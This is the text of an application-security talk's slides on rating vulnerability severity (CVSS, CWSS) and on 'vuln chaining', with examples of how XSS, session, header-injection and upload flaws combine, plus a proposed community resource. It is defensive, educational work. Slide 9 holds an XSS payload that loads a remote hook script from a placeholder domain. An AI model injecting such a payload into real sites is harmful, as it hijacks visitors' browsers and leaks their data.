I introduce what I think is a new idea to track and relate vulns to each other in a data store. In AppSec, most people understand that context is everything when it comes to assigning risk. Certain factors and other vulnerabilities, when combined together, can increase the severity of a vulnerability. Defenders and bug hunters alike help organizations understand a more accurate threat landscape from experience, but it's not something that is well documented. Join Curtis as he discuses this gap and introduces some tools and new resources for vuln chaining.

1. Using Vuln Chaining and Other
Factors for a Better Risk
Perspective
By Curtis Brazzell (Say Hi @curtbraz on Twitter/LinkedIn/Gmail!)

2. About Me?
 Interested in computers/security from an early age
 Former DBA/Sys Admin (4-6 years)
 Security field for 10+ years (mostly consulting)
 Sr SOC Analyst
 DFIR Lead (Malware Analysis)
 AppSec/Pentesting/Red Team
 Currently an MSC for GuidePoint Security on the AppSec (Tactical) Team
 Passionate about anything security (especially phishing!)
 Want to be known for research/tool contributions (known instead for …. )
 Like to try to put a new spin on old topics

3. Severity Ratings
 Importance for accuracy to understand risk
 Can be subjective
 Should be challenged!
 Context is everything!
 Unique environments
 External/Internal
 Pre-Auth/Auth
 Roles/Permissions/Privileges
 Exploitability
 Compensating controls / mitigations
 CVSS/CWSS

4. Severity Ratings
 Common Vulnerability Scoring System (CVSS)
 Open Framework
 Three metric groups:
 Base (What you get by default from most vuln scanners using the NVD)
 Temporal (Metrics that change over time due to external events)
 Environmental (Impact of the vuln on your org)
CVSS v3.0 Ratings
Severity Base Score Range
None 0.0
Low 0.1-3.9
Medium 4.0-6.9
High 7.0-8.9
Critical 9.0-10.0

5. Severity Ratings
 Common Weakness Scoring System (CWSS)
 Can be used in conjunction with the Common Weakness Risk Analysis Framework (CWRAF)
 Three metric groups:
 Base (Inherent risk, confidence, and strength on controls)
 Attack Surface (Barriers an attacker must overcome to exploit)
 Environmental (Characteristics that are specific to an environment/context)
 Ranges between 0 and 100

6. Getting it Wrong
 Getting Impact, likelihood of attack, or exploitability wrong (also subjective)
 Missing vulnerabilities or not taking the vuln far enough
 Lack of experience (bug bounties, new hires, etc)
 Lack of time
 Misunderstanding of the environment
 Industry
 What the app does
 Ask for demos!
 May be a non-issue even
 Dangers of getting it wrong
 Too low and it doesn’t get prioritized / risk isn’t acknowledged
 Too high and you take priority from more important issues / dev time / other resources / client or app’s reputation

7. Vuln Chaining 101
 Combining vulnerabilities for a greater impact!
 More than one lower-serverity issue may be combined for a higher risk rating
 Vulns don’t live in a vacuum!
 Examples:

8. Vuln Chaining (Examples)
Cross-Site Scripting (XSS) Unprotected Session Cookie
Medium Low
High
OR Local Storage Session
Low
Session Hijacking/Account Takeover
Credit to blog.ropnop.com/storing-tokens-in-browser

9. Vuln Chaining (Examples)
Cross-Site Scripting (XSS) CORS/CSP Misconfiguration Sensitive Data Leakage / 3P Scripts (Beef)
Medium High
Medium
XSS Payload = <script src=“thirdpartydomain/hook.js”>

10. Vuln Chaining (Examples)
Header Injection Duplicate Headers / Newline Chars Cross-Site Scripting / Host Poisoning, etc
High
Medium
High
Adding newline characters to break into the body or cut off / duplicate headers

11. Vuln Chaining (Examples)
Low
High
Low
Session Token in URL /
Password Submission
Low
Session Hijacking/Account Takeover
Missing HSTS Enforcement
No Secure Flag

12. Vuln Chaining (Examples)
Low
High
Low
Session Fixation
Low
Unauthorized Access via Session Hijacking or Unattended Session
No or Long Session Timeout Concurrent User Sessions

13. Vuln Chaining (Examples)
Unrestricted File Uploads Authorization Issues (No Auth) XSS/Form Jacking/Open Redirects
Medium Low High
With Auth SSRF/RCE/XXE
High
OR
& IDOR

14. Vuln Chaining
 Where’s the documentation?
 If I come across a vuln, how do I know what others to look for?
 Experienced people “just know” from memory
 Individual ones (like the previous examples) are often on blogs and public bug bounty reports
 My Idea / Contribution / Project..
 Create a community-driven open resource!
 Why am I doing this?

15. Vuln Chaining (Mind Map PoC)
OR

16. Vuln Chaining (Mind Map PoC)
https://atlas.mindmup.com/2021/10/
aa8b215037f611ecbbbb01ecf8fc07de
/vuln_chain/index.html
I published at

17. Vuln Chaining (Relational Database)

18. Vuln Chaining (Practical Uses)
 Used by an AppSec resource for more accurate assessments
 Educational Resource / Training | Better Bug Bounties
 Used by an internal org for threat modeling self-assessments
 Examples of use:

19. Vuln Chaining (Web Form)

20. Other Uses and Closing Thoughts
 Could be implemented as a tool to import a CSV template (think compliance)
 Would love to see integration into vuln scanners by default
 Burp Extender plugin FTW! (Any takers?)
 Cool card game? (Think Backdoors & Breaches or the OWASP deck)

21. Thank You! Questions?
 We’re hiring AppSec folks at GuidePoint Security!
 Tactical and Strategic Services